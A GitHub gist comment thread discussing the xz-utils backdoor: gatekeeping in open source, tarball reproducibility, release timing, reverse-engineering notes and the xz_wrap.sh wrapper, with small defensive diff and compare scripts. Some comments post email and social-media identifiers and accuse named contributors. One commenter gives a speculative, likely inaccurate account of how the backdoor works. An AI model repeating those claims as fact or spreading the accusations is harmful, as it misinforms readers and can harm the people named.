Also, the whole community needs to not succumb to the vanity of any person or group pushing hard to get their personal pet projects merged into the foundation that everyone uses. As much software as possible should be built on top of Linux, as packages which can be installed like it has always been, not into Linux either in the kernel or as kernel patches included by default in major distributions or packages installed by default. The more "blank slate" a base Linux installation is by default, the better off everyone is. This is especially true for distributions which are focused on serious use like Debian. Most people, and in turn the infrastructure they create, use major distributions as a base, so the decisions made by major distributions also have a great impact; it is not only the kernel team that must be vigilant.

If you look at the kernel mailing list, Torvalds has been active in fighting against the tide of many people trying to push all kinds of bullshit into the kernel source tree. But the major distributions, to my (limited) knowledge, don't have such a strong gatekeeper, and all the distros are getting increasingly bloated and include more and more unnecessary features by the day. Also, Torvalds will eventually retire; what will happen then, who will fight against the tide? That not only makes me scared for the future of Linux, but also shows that it's not a good idea to rely on a single gatekeeper to keep all the bullshit out. I mean, over a decade ago there was a serious push to move the Linux kernel to C++, which Torvalds promptly stopped in its tracks, thank god. Where would we be without people pushing back and wanting to contemplate first? We need more of those people as maintainers in the OSS community, the critical thinkers and slow and steady types.

How could the OSS community at large come to the realization that critical foundations need to be handled with proper care, which means taking your time, and that not every feature needs to make it in just because it's new and shiny? The problem at large is that the group who want "feature X" to be added are usually loud and obnoxious and push hard, while most people who think "is this really necessary" either say nothing out of politeness or do not care enough. Then, even when maintainers think so too, it's easy to fall for the psychological effect of "oh, this must then be what people really need" and get bullied into merging a new feature without proper checks and balances. Rinse and repeat a hundred times and suddenly the distribution has become much more bloated and harder to audit, since a hundred new features, each of which some person might just maybe need sometime, have been added as default.

TL;DR; Everyone who is a developer in any critical software work like kernel, core utilities, major distributions of Linux, etc., take your time. The world will not end if a new feature doesn't get added in tomorrow. It just might though if you add something in a hurry. You don't owe anyone anything, especially not someone bugging you to immediately add a "feature X" because some small subset of users might want to use it.

@Z-nonymous

Z-nonymous commented Apr 5, 2024

Wait until snaps and flatpaks are properly exploited. 😂

@Aqa-Ib

Aqa-Ib commented Apr 5, 2024

Well said anzz1. You can even extrapolate what you said to everything that human society does. It is practically impossible to stop this crazy development that we have as a whole. However, those individuals who make things carefully can be of great value for our future.

@Daniel15

Daniel15 commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

GitHub already has built-in support for generating tarballs based on a tag (for example, https://github.com/Daniel15/prometheus-net.SystemMetrics/archive/refs/tags/v3.1.0.tar.gz). This is guaranteed to match the code in source control.

The issue is that sometimes the tarballs legitimately differ from the repo contents, particularly if the project uses automake. However, this is not ideal, and projects should strive to have reproducible builds, meaning the code to build the project is exactly the same as the code checked in to source control, and building the code from source always produces the same binary (so anyone can build the project from source to verify that a precompiled executable was built from the same source code, as it'll be exactly identical). One of the more common issues with achieving reproducible builds is timestamps, for example if the current build time is embedded in the executable.

Having said that, as others have mentioned, that wouldn't have helped here. The attacker was in full control of the source control repo, and could have just put everything in there rather than just in the tarball.
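For anyone who still wants to see how a release tarball differs from a checked-out tag, here is a minimal Python sketch. It is not how any distro does it; the function name `compare_tarball_to_tree` and the `strip_components` parameter are made up for illustration, and it assumes the tarball has a single top-level directory such as `project-1.2.3/`. As noted above, differences are often legitimate (autotools-generated files), so the output is a list of things to review, not proof of tampering.

```python
import hashlib
import tarfile
from pathlib import Path, PurePosixPath


def compare_tarball_to_tree(tar_path, tree_dir, strip_components=1):
    """Compare regular files in a tarball against a checked-out source tree.

    Returns two sorted lists of relative paths:
    files present only in the tarball, and files whose contents differ.
    """
    tree_dir = Path(tree_dir)
    only_in_tarball, differing = [], []
    with tarfile.open(tar_path) as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            # Drop the leading "project-x.y.z/" directory (assumed layout).
            parts = PurePosixPath(member.name).parts[strip_components:]
            if not parts:
                continue
            rel = PurePosixPath(*parts).as_posix()
            data = tar.extractfile(member).read()
            local = tree_dir.joinpath(*parts)
            if not local.is_file():
                only_in_tarball.append(rel)
            elif (hashlib.sha256(local.read_bytes()).digest()
                  != hashlib.sha256(data).digest()):
                differing.append(rel)
    return sorted(only_in_tarball), sorted(differing)
```

Usage would look like `compare_tarball_to_tree("xz-5.6.1.tar.gz", "path/to/git/checkout")`, where both paths are placeholders for wherever the files live locally.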

@Daniel15

Daniel15 commented Apr 5, 2024

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

@bogd IPv6 does help though. Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56), and you can run your SSH server on a random IP in the middle of the range. Just stick the IP in an internal-only DNS zone and don't expose the DNS record publicly. That's far less likely to be found during a scan, compared to IPv4 where the entire public IPv4 range can be scanned in 5-15 minutes (https://github.com/robertdavidgraham/masscan).

Sure, it's security through obscurity and thus isn't a proper security measure, but I've been running a honeypot server in one of my /64 ranges for a few years and so far nobody has hit it. IPv6 traffic to some of my sites is around 45% of total traffic, so people are using IPv6 otherwise 🙂
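To put rough numbers on the scanning argument, here is a back-of-the-envelope Python sketch. It assumes a scanner that covers all of IPv4 in 5 minutes (the optimistic end of the 5-15 minute range above) and keeps the same probe rate against a single /64; `2001:db8::/64` is just the documentation prefix used as a stand-in, and `years_to_scan` is a name made up for this example.

```python
import ipaddress

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def years_to_scan(network: str, probes_per_second: float) -> float:
    """Years needed to probe every address in `network` once at a fixed rate."""
    hosts = ipaddress.ip_network(network).num_addresses
    return hosts / probes_per_second / SECONDS_PER_YEAR


# Assumption: the whole IPv4 space (2**32 addresses) is covered in 5 minutes.
ipv4_total = ipaddress.ip_network("0.0.0.0/0").num_addresses
rate = ipv4_total / (5 * 60)

if __name__ == "__main__":
    print(f"probe rate: {rate:,.0f} addresses/s")
    print(f"one /64 at that rate: {years_to_scan('2001:db8::/64', rate):,.0f} years")
```

At that rate a single /64 works out to tens of thousands of years for one pass, which is why blind sweeps do not find a host on a random address. It does nothing against an attacker who already knows the address.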

@ormaaj

ormaaj commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities.

This was caught as early as it was thanks entirely to the abundance of people testing new release code in a wide variety of environments. That is made possible by downstream distributors that integrate test packages into their systems so they are easily available. Testers of upstream prerelease code had no opportunity to find this.

This is the system working exactly as it should.

@fatience

fatience commented Apr 6, 2024

Neustradamus's behaviour is indeed suspicious.
https://news.ycombinator.com/item?id=39868682

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Someone more experienced with this should definitely take a look.

@bogd

bogd commented Apr 6, 2024

@bogd IPv6 does help though.

No arguments there - it does help, it's just not the panacea that some people think it is :)

Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56)

There's a very nice conversation here about how allocating 1 trillion times the entire IPv4 address space for a single server is "a good idea" (TM), and I am old enough to remember the days when we allocated an IPv4 /8 for a single network, because "the address space is so large, it is practically infinite". But as I was saying, I do not want to sidetrack this conversation and go into other topics - the original topic is far too important.
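As a sanity check on the "1 trillion times" figure, the arithmetic can be done with Python's standard `ipaddress` module. This is only a sketch: `2001:db8::` is the documentation prefix used as a placeholder, and `times_ipv4` is a helper name invented here.

```python
import ipaddress

IPV4_SPACE = ipaddress.ip_network("0.0.0.0/0").num_addresses  # 2**32


def times_ipv4(prefix_len: int) -> int:
    """How many whole IPv4 address spaces fit into one IPv6 prefix of this length."""
    net = ipaddress.ip_network(f"2001:db8::/{prefix_len}")
    return net.num_addresses // IPV4_SPACE


if __name__ == "__main__":
    for plen in (64, 56):
        print(f"/{plen}: {times_ipv4(plen):,} x the IPv4 space")
```

A /56 comes out at 2**40 (about 1.1 trillion) times the IPv4 space, so the figure matches a /56 allocation; a /64 is 2**32 (about 4.3 billion) times.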

Sure, it's security through obscurity and thus isn't a proper security measure

That was my entire original point. Maybe that, plus what others have added:

  • IPv6 would not have protected against an application-level backdoor
  • this attack does not look like something that would be used against random targets, discovered during a "routine" scan. Looks more like something one would save to use against extremely high-value, known targets. I know, assumption, but... not an illogical one.

@AdrianBunk

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

You should read the links provided by this person, these are proposals for upcoming internet standards.

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Mozilla accepted an implementation from someone else that implemented a major part of the original request, this is a strong indication that the request made sense.

please do not respond to closed bugs asking for additional features. Please file a separate bug for new features.

That's a very common mistake, nothing suspicious about that.

behaviour is indeed suspicious.

It can be really harmful when people who clearly have no experience interacting with users in open source projects are making such bold accusations, it happens far too often that a brainless internet mob drives innocent people into suicide.

@thesamesam
Author

thesamesam commented Apr 6, 2024

I am familiar with that person (I don't know him) and my take has always been that he's enthusiastic but ends up irritating a lot of people (me included) because of how he goes about things. I don't think he's malicious, just ends up causing hassle for FOSS maintainers. This situation is cause to pause and reflect on behaviour but I don't think people should be chasing after him.

@Chestnuts4

Chestnuts4 commented Apr 6, 2024

Sorry, I want to know how I can get xz-5.6.1.tar.gz, so that I can diff it the same way you did

git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4

@Chestnuts4

xz-5.6.1

Where can I download the original build-to-host.m4? I got xz-5.6.1.tar.gz from GitHub.

@thesamesam
Author

thesamesam commented Apr 6, 2024

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

@Chestnuts4

@thesamesam thanks for your reply, I got the original build-to-host.m4 from GitHub and successfully diffed it
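For reference, the same comparison can be done without git. Below is a minimal Python sketch using the standard `difflib` module; the function name `diff_m4` and the example paths are placeholders, with the known-good copy assumed to come from gnulib or `/usr/share/aclocal` as described above.

```python
import difflib
from pathlib import Path


def diff_m4(original_path, suspect_path):
    """Return unified-diff lines between a known-good file and a suspect copy."""
    # errors="replace" keeps the diff going even if a file has odd bytes in it.
    original = Path(original_path).read_text(errors="replace").splitlines(keepends=True)
    suspect = Path(suspect_path).read_text(errors="replace").splitlines(keepends=True)
    return list(difflib.unified_diff(
        original, suspect,
        fromfile=str(original_path), tofile=str(suspect_path),
    ))


if __name__ == "__main__":
    # Placeholder paths: adjust to wherever the two copies actually live.
    good = Path("/usr/share/aclocal/build-to-host.m4")
    bad = Path("xz-5.6.1/m4/build-to-host.m4")
    if good.is_file() and bad.is_file():
        print("".join(diff_m4(good, bad)))
```

An empty result means the two files are identical line for line. The locally installed gettext/gnulib copy may be a different serial than the one the tarball was based on, so some benign differences are possible.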

@ivq

ivq commented Apr 7, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was
acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma?
(1) Bouffalo Lab has a series of RISC-V SoCs, See Products
(2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma.
(3) The lzma BCJ filters can improve compression ratio
(4) Compression ratio matters, saved flash size is profit
(5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like
the used genromfs tool, See BLDevCube calling bundled genromfs binary
(6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name
I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation
to non-mandarin speakers.

About the ongoing CPython PR binary test file
The reason I chose them is easy: why not use upstream test vectors if upstream has them?
However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

Don't take a gust of wind for rain (that is, don't jump to conclusions).

@redcode

redcode commented Apr 7, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

@RufusExE

RufusExE commented Apr 8, 2024

Don't take a gust of wind for rain (that is, don't jump to conclusions).

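I'm only looking at this from a penetration perspective, having considered all the possibilities. First, an English name would clearly have made him harder to locate and analyze, and in fact the accomplices he chose to push things along were English-name personas. Yet he picked a name that obviously fits a political narrative and makes it easier to pin on a particular group, and he even left a tell by using a pinyin-level mix of Chinese and Western romanization in the middle of the name (a very strange move, mixing the professional with the unprofessional). Then there is the seemingly accidental proxy IP hop. In terms of tradecraft, if he can disguise himself once, he can do it many times; in terms of technique, his skill level is not really in dispute. I think it is better to treat this as a drill or trial run by an extremely professional individual or team.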

@ivq

ivq commented Apr 8, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

No, we never talked in Chinese. There were only a few e-mails then and I did not find any useful information regarding social engineering.

@ramizpolic

This seems to me more like a team rather than individual effort.

@schkwve

schkwve commented Apr 8, 2024

I've been out of this discussion for a while; has anything interesting been said in this discussion (that has not been mentioned in the gist)?

@roccotanica1234

I don't know if it's relevant, but it appears that Hans Jansen has an account on proton.me (hansjansen162@proton.me), with the Outlook address (hansjansen162@outlook.com) set up as the recovery email.

@AdrianBunk

@thesamesam Regarding "Solar Designer suggested this may have caused", this might be disproved by 5.6.0 being released and in Debian before the MR:
https://tracker.debian.org/pkg/xz-utils
systemd/systemd#31550

The Debian Import Freeze for Ubuntu LTS on February 29 is something I would consider more likely for the timing of the 5.6.0 release:
https://discourse.ubuntu.com/t/noble-numbat-release-schedule/35649

The next chance of getting the backdoor into an Ubuntu LTS would have been 2026, releasing in February for getting millions of backdoored production machines around the world in May would be a logical plan.

@thesamesam
Author

@AdrianBunk Ah, thanks! I remember being subscribed to the systemd PR before all of this and I think that meant I assumed it was older than it was, so I figured the timelines made sense. I'll make those corrections in a minute.

@thesamesam
Author

@AdrianBunk Can you check out what I've written now? There's some nuance in it. I think you're right that this makes the theory rather unlikely, although it's interesting that it was first brought up in January.

@AdrianBunk

@thesamesam Some thoughts on that:

The "a systemd developer suggested extending the approach to compression libraries" comment was 2 days after the release of 5.6.0, more relevant would be systemd/systemd#31131 (comment)

The timing of 5.6.0 is a good fit for getting into Ubuntu LTS, and that could explain the timing no matter what happened at systemd.

Lennart and Andres are both working at Microsoft, even the reverse direction that some government agency had advance knowledge of the planned backdoor and nudged people in the right direction cannot be ruled out.

@thesamesam
Author

thesamesam commented Apr 8, 2024

From my own participation in discussions on IRC, the plan was absolutely to be in the next Ubuntu LTS, btw. Jia pushed for an accelerated release schedule to make it in.

@thesamesam
Author

thesamesam commented Apr 8, 2024

@AdrianBunk Many thanks again. I'll try to find somewhere to mention the Ubuntu LTS thing, given it was absolutely true - even if I can't speak to motive. I'd prefer to mention it outside of the systemd thing given that part is getting a bit big and it's not strictly relevant to that, but I am happy to hear dissenting opinions.

@the-lne

the-lne commented Apr 9, 2024

Obviously someone would look into performance inconsistencies on an opensource tool of all things. That's like selling a sick dog to a veterinarian. What we did is catch the lowest hanging fruit. There probably are more out there in even more critical tools that we will never know about because who doesn't have something to gain from that. This isn't news, it's writing on the wall and a warning to be a little less trustful. Imagine if he actually knew what he was doing, or what a team of sponsored professionals could do. Hopefully future commits are held to a higher standard on critical applications.

@AdrianBunk

@thesamesam Regarding "Checking other projects for similar injection mechanisms", Debian has an online search engine that provides literal and regex searches over up-to-date sources of the 38k packages in Debian unstable like:
https://codesearch.debian.net/search?q=grep+-aErls&literal=1
https://codesearch.debian.net/search?q=Automake+1.10a&literal=1

I checked interesting strings from the manipulated build-to-host.m4, and there was nothing that looked suspicious to me.
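If you want to run a batch of such literal searches, the URLs can be generated rather than typed by hand. This is a small Python sketch that only reproduces the URL shape of the two links above (`q=...&literal=1`); the helper name `codesearch_url` and the idea of looping over a list of strings are assumptions for illustration, and it does not query the service or parse results.

```python
from urllib.parse import urlencode

CODESEARCH_BASE = "https://codesearch.debian.net/search"


def codesearch_url(query: str) -> str:
    """Build a literal-search URL in the same form as the links above."""
    return f"{CODESEARCH_BASE}?{urlencode({'q': query, 'literal': 1})}"


if __name__ == "__main__":
    # Example strings taken from the two links above.
    for needle in ("grep -aErls", "Automake 1.10a"):
        print(codesearch_url(needle))
```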

@felipec

felipec commented Apr 10, 2024

This one is really complete: The xz attack shell script, it shouldn't be "other".

@christoofar

christoofar commented Apr 10, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma? (1) Bouffalo Lab has a series of RISC-V SoCs, See Products (2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma. (3) The lzma BCJ filters can improve compression ratio (4) Compression ratio matters, saved flash size is profit (5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like the used genromfs tool, See BLDevCube calling bundled genromfs binary (6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation to non-mandarin speakers.

About the ongoing CPython PR binary test file The reason I chose them is easy: why not use upstream test vectors if upstream has them? However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.
There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

Don't take a gust of wind for rain (that is, don't jump to conclusions).

The filter flag changes made to xz have been run down (S/O to https://github.com/smx-smx/xzre for assembling the best puzzle piece reconstruct https://smx-smx.github.io/xzre/globals.html) allowing so many more people to jump into disassemblers to figure out this puzzle.

Note: People keep saying (wrongly) that sshd is compromised. There's always room for improvement in anything. sshd is not how this nasty thing gets on a machine. It does exploit both systemd and ld in concert so that when systemd launches a fork(), it grabs a hold of ld for its audit hook and reads through the rest of the load. From there it can replace any function in memory that it wants.

It's a hotloader delivery platform that can target any process in Linux. The entire memory of the computer is its oyster.

All that work you made hashing credit card digits info before storing them in db2? Who cares, liblzma.so if the creators want, can kick a new variant on to your host and read it.

The data types used to support the flags are how the backdoor finds a way to maintain state in memory and not be seen. The RISC-V option was added to lzma in the publicly visible code, along with the refactor of lzma, to hide small adjustments that allow not just structures like lzma_vli but also other data structures in lzma to be used to hold areas in memory. It uses an x64 disassembler against areas of the entire process space, including everything systemd manages, and copies out and replaces what should have been static code set to read-only. It hijacks ld way earlier than thought (and it hijacks itself), so all the data structures in liblzma.so can be used to hold things that are hard to construct, like function tables built by scanning both the ABI and LD_AUDIT to verify its work, and push that into its own reserved areas and escape observation.

Why don't you show us some proofs @ivq that the changes you wanted into CPython would give you a performance boost? Did you verify that on your own testbed? How about you post your results, here.


So, that 5.6.0 to 5.6.1 update Jia Tan put out? RE effort exposed the loading/init pathway where the code is trying to erase what's probably an examine tool (my theory), which is another hotloaded side-car that they use locally to debug and keep track of the integration as they continue to layer more techniques to thwart analysis. How does that happen? Well, the crash from valgrind came from the microlzma function.

Talking out the ASM by hand the RE team learned that it was not nuking in its own stack area. It was trying to erase an adjacent stack area. Because liblzma.so can walk the ELF and the memory space to find the offsets for the calls it wants to use, this indicates that there's more than one build process:

  • The one we see in the distros
  • Another one baking the toxic .o injectors

A mismatch in feature flags when running the build for the injectors is why Jia had to hustle, because Jia (who's really a whole team of people) did not know that valgrind is run before some OSS developers' releases.

Full report on the top-level symbol differences between the .0 and .1 crc_64 injectors is here:
https://jiatanfunctions.tiiny.site/

@DaLynxx

DaLynxx commented Apr 10, 2024

xz @ github is available again. https://github.com/tukaani-project

@christoofar

christoofar commented Apr 10, 2024

Right now @ivq I don't believe your word salad without showing some RISCV proofs against a direct invocation of 5.6.0 or 5.6.1

Pull out your RISCV board and do a time test and post it here, then.

Anyway... both the encoder initter and decoder initter got this harmless looking adjustment that, in the decoder, is not used at all and is only meant by Lasse to report out completed results of decompression. But with the right compile options it survives being removed. Since the filter options themselves are a travel point every point in code, guess where the pointers to the backdoor go?

The harmless-looking filter flags update is critical to activating the backdoor. There are so many data structures to hijack inside lzma, some so handy that promoting simpler types into pointers is not even needed. You essentially have your own database.

Which is what lzma_vli probably will be promoted to someday in a server hotpatch, who the hell knows.

image

@DaLynxx

DaLynxx commented Apr 10, 2024

Also https://xz.tukaani.org/xz-utils/ no longer responds. (affects link under chapter 'Background')

@christoofar

christoofar commented Apr 10, 2024

Most HLL programmers are just gonna go "huh?" because they cannot understand the concept in their minds that when you leave an area of memory loaded with your porn stash without wiping it and just zero the pointer out, your porn history table still sits there in RAM.

Now Jia can read it.

There's still no idea how much is left to find. I'm reliving my Compaq Deskpro 8086 days, which was the last time I wrote asm. I don't know a thing about x64 asm beyond just the register sizes and effects (and some of the original x86 opcodes), and there is so much more to discover.

liblzma.so is both a nightmare, and a masterpiece of layered integration. And the thing is fucking evil.

Fucking. Evil.

P.P.S.: All the credit to everyone helping out on the RE. I'm not a security huckster shilling corps with CBT videos. I have done integrations of weird shit to normal shit my whole career, pulling out and sussing through crashdumps, register readouts, logs and any other evidence I can get my hands on when I get stuck and have to produce the normie-version of events, so that when developers are trying to throw shit over the wall, the developers who have no control on their side of the fence have solid ammo to fire back with. "They broke our shit" is what gets me going.

When I'm coming for you with a diff report, run.

@christoofar

christoofar commented Apr 10, 2024

Oh, cool bin trick from fiddling with game roms:

Compact a bin (gz will do in many cases, not all but most). You can spot where data goes and where code goes when the compaction strips away all the 00 FF patterns left around for initializers. It only works for empties, but in corpland and especially in C++ there are monster data structures that compact to almost nothing.

In Jia Tan's case, the function delete reorders everything that survived, resulting in a byte slide that picks up well on the radar.
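A rough sketch of the compaction trick, assuming `dd`, `gzip` and `wc` are on the box. The helper name `chunk_sizes` and the 4096-byte default chunk are picked here for illustration and are not taken from the RE effort. It prints the gzip-compressed size of each fixed-size chunk, so padded or empty regions show up as tiny numbers and dense code or data as large ones:

```sh
#!/bin/sh
# Hypothetical helper: print "<offset> <compressed-bytes>" for every
# fixed-size chunk of a binary.
chunk_sizes() {
    file=$1
    chunk=${2:-4096}
    # Arithmetic expansion strips any padding wc adds around the number.
    total=$(( $(wc -c < "$file") ))
    offset=0
    while [ "$offset" -lt "$total" ]; do
        # Read exactly one chunk at this offset and count its gzip'd size.
        size=$(( $(dd if="$file" bs="$chunk" skip=$((offset / chunk)) count=1 2>/dev/null | gzip -c | wc -c) ))
        echo "$offset $size"
        offset=$((offset + chunk))
    done
}
```

Running `chunk_sizes` on two builds of the same library and diffing the two outputs gives a coarse picture of where bytes moved. It is only a first-pass signal, not a substitute for a real binary diff.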

You already have a bindiff analyzer on your box. It's in emacs (the other malware you can get from the distros). It's a neat trick when a vendor sends something and I need a clue of how "big" their changes were. Generally speaking, they keep 9 layers of mis-management between me and the other team actually doing the work, so it helps to sense when they aren't talking but the bins they're walking indicate they're doing a refactor job on the inside.

Jia again:
image

@terokinnunen

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

Thanks, I was puzzled about this too for quite a while. Just an idea - pointer to legit upstream https://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=blob;f=m4/build-to-host.m4;h=f466bdbd84abdf60e8305fa7adc12c74d7f05a8a;hb=HEAD would be helpful clarification here.
(Probably the TODO item "Explain dist tarballs" will cover this later (?), but until then, a quick pointer in Design section would clarify a lot.)
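Until that section exists, a comparison against a trusted copy can be sketched like this. The helper name `check_m4` is made up for illustration, and both paths in the usage note are assumptions about where the files live on a given system:

```sh
#!/bin/sh
# Hypothetical helper: compare a candidate m4 file against a trusted reference.
check_m4() {
    reference=$1
    candidate=$2
    if cmp -s "$reference" "$candidate"; then
        echo "identical"
    else
        echo "differs"
        # Show what changed; diff exits non-zero on differences, so ignore its status.
        diff -u "$reference" "$candidate" || true
    fi
}
```

For example, `check_m4 /usr/share/aclocal/build-to-host.m4 path/to/unpacked-tarball/m4/build-to-host.m4`. A difference is not proof of tampering by itself, since gnulib revisions legitimately differ from each other; it only tells you where to start reading.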

@christoofar

christoofar commented Apr 10, 2024

🤔

Any particular reason, Jia Tan, why you nuked this whole area and put in its place the execution path that takes you to the backdoor?

image

image

@rybak

rybak commented Apr 10, 2024

FYI, the malicious commits (the in-repository portion of the backdoor) were reverted: e93e13c (Remove the backdoor found in 5.6.0 and 5.6.1 (CVE-2024-3094)., 2024-04-08).

@thesamesam
Author

I'll try to respond to the above comments which need me to make changes later today. Thanks.

@roccotanica1234

Jia Tan's Twitter account, associated with jiat0218@gmail.com, is: https://twitter.com/JiaT03868010 (I haven't found it mentioned anywhere)

@flybyray

What is "this"? xz_wrap was recently changed by Lasse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528

which is quite different from all other compression tools.
It does not pipe directly into the xz tool; it uses an additional sh process in the hierarchy. sh provides additional insight via environment variables for child processes.
The whole thing has nothing to do with stripped down xz decompression code within the kernel.
The call goes into what is packaged in the kernel build environment for $XZ.

eval "$($XZ --robot --version)" || exit

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36

When you follow @christoofar lookups you may notice that $XZ might work differently when it detects specific things.
$XZ for sure is linked to liblzma.so.

@Artoria2e5

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

@flybyray

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

Better safe than sorry. Ask yourself what a NON-*-EXPLANATION is worth. Especially an explanation which is at all wrong - shows just that supplier has no experience.

@Artoria2e5

Artoria2e5 commented Apr 12, 2024

sh provides additional insight via environment variables for child processes.

It also does not, because the shell script in question does not export anything new to the environment. The shell only changes envp in three circumstances:

  • when a new variable is explicitly added to envp via "export" or "declare -x"
  • when a variable is explicitly de-exported, say by running declare +x
  • when an already-exported variable, such as PATH, is changed or unset

Otherwise every variable change stays local to the shell process.

The only additional "insight" is just the well-documented BCJ and lzma alignment parameters.
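The export rule is easy to check by hand. A minimal sketch, assuming a POSIX `sh`; the variable names `LOCAL_ONLY` and `SHARED` are invented for the demonstration and do not appear in xz_wrap.sh:

```sh
#!/bin/sh
# Illustrative names only: LOCAL_ONLY and SHARED are not from xz_wrap.sh.
unset LOCAL_ONLY SHARED

LOCAL_ONLY=parent-value   # plain assignment: stays inside this shell
SHARED=parent-value
export SHARED             # explicitly added to the environment of children

# Each child prints the variable, or "unset" if it never received it.
local_seen=$(sh -c 'printf %s "${LOCAL_ONLY-unset}"')
shared_seen=$(sh -c 'printf %s "${SHARED-unset}"')

SHARED=changed            # already exported, so the change propagates too
shared_changed=$(sh -c 'printf %s "${SHARED-unset}"')

echo "LOCAL_ONLY in child: $local_seen"       # unset
echo "SHARED in child: $shared_seen"          # parent-value
echo "SHARED after change: $shared_changed"   # changed
```

This only covers what a child process can see through its environment. Anything a child writes to stdout or to disk is a separate channel and is not affected by export.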

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

@paulfloyd

paulfloyd commented Apr 12, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@flybyray

flybyray commented Apr 12, 2024

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

because the shell script in question does not export anything new to the environment

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.
I wrote "insight via environment variables for CHILD processes". How dare you then talk about "does not export anything new to the environment"? I wish you would rather fantasize about the similarity between eval and evil.

have you really understood only some of the attack patterns that have already been discussed here? because of course the attackers in a build process don't care about changing the environment! just think about how many places environment variables could appear in logs and the hide-and-seek game would end immediately. I would recommend to you, that you inspect some public build servers and their artifacts and detailed outputs of builds.

The trick is to leave artifacts in the right places as inconspicuously as possible during the build process.

